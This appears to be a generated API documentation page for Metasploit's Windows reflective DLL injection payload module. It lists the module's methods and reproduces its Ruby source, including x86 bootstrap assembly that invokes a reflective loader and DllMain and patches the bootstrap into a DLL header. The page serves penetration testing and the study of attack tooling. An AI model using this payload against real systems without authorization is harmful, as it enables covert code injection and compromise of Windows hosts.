Module: Msf::Payload::Windows::ReflectiveDllInject
- Includes:
- Msf::Payload::Windows, ReflectiveDLLLoader
- Defined in:
- lib/msf/core/payload/windows/reflective_dll_inject.rb
Constant Summary
Constants included from ReflectiveDLLLoader
ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER
Instance Method Summary collapse
- #asm_invoke_dll(opts = {}) ⇒ Object
- #initialize(info = {}) ⇒ Object
- #library_path ⇒ Object
- #stage_payload(opts = {}) ⇒ Object
Methods included from Msf::Payload::Windows
#apply_prepends, exit_types, #handle_intermediate_stage, #include_send_uuid, #replace_var
Methods included from PrependMigrate
#apply_prepend_migrate, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64
Methods included from ReflectiveDLLLoader
#load_rdi_dll, #load_rdi_dll_from_data
Instance Method Details
#asm_invoke_dll(opts = {}) ⇒ Object
40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 |
# File 'lib/msf/core/payload/windows/reflective_dll_inject.rb', line 40 def asm_invoke_dll(opts={}) asm = %Q^ ; prologue dec ebp ; 'M' pop edx ; 'Z' call $+5 ; call next instruction pop ebx ; get the current location (+7 bytes) push edx ; restore edx inc ebp ; restore ebp push ebp ; save ebp for later mov ebp, esp ; set up a new stack frame ; Invoke ReflectiveLoader() ; add the offset to ReflectiveLoader() (0x????????) add ebx, #{"0x%.8x" % (opts[:rdi_offset] - 7)} call ebx ; invoke ReflectiveLoader() ; Invoke DllMain(hInstance, DLL_METASPLOIT_ATTACH, config_ptr) push edi ; push the socket handle push 4 ; indicate that we have attached push eax ; push some arbitrary value for hInstance mov ebx, eax ; save DllMain for another call call ebx ; call DllMain(hInstance, DLL_METASPLOIT_ATTACH, socket) ; Invoke DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk) ; push the exitfunk value onto the stack push #{"0x%.8x" % Msf::Payload::Windows.exit_types[opts[:exitfunk]]} push 5 ; indicate that we have detached push eax ; push some arbitrary value for hInstance call ebx ; call DllMain(hInstance, DLL_METASPLOIT_DETACH, exitfunk) ^ end |
#initialize(info = {}) ⇒ Object
18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 |
# File 'lib/msf/core/payload/windows/reflective_dll_inject.rb', line 18 def initialize(info = {}) super(update_info(info, 'Name' => 'Reflective DLL Injection', 'Description' => 'Inject a DLL via a reflective loader', 'Author' => [ 'sf' ], 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original [ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations ], 'Platform' => 'win', 'Arch' => ARCH_X86, 'PayloadCompat' => { 'Convention' => 'sockedi -https', }, 'Stage' => { 'Payload' => "" } )) ( [ OptPath.new( 'DLL', [ true, "The local path to the Reflective DLL to upload" ] ), ], self.class ) end |
#library_path ⇒ Object
36 37 38 |
# File 'lib/msf/core/payload/windows/reflective_dll_inject.rb', line 36 def library_path datastore['DLL'] end |
#stage_payload(opts = {}) ⇒ Object
70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 |
# File 'lib/msf/core/payload/windows/reflective_dll_inject.rb', line 70 def stage_payload(opts = {}) # Exceptions will be thrown by the mixin if there are issues. dll, offset = load_rdi_dll(library_path) asm_opts = { rdi_offset: offset, exitfunk: 'thread' # default to 'thread' for migration } asm = asm_invoke_dll(asm_opts) # generate the bootstrap asm bootstrap = Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string # sanity check bootstrap length to ensure we dont overwrite the DOS headers e_lfanew entry if bootstrap.length > 62 raise RuntimeError, "Reflective DLL Injection (x86) generated an oversized bootstrap!" end # patch the bootstrap code into the dll's DOS header... dll[ 0, bootstrap.length ] = bootstrap dll end |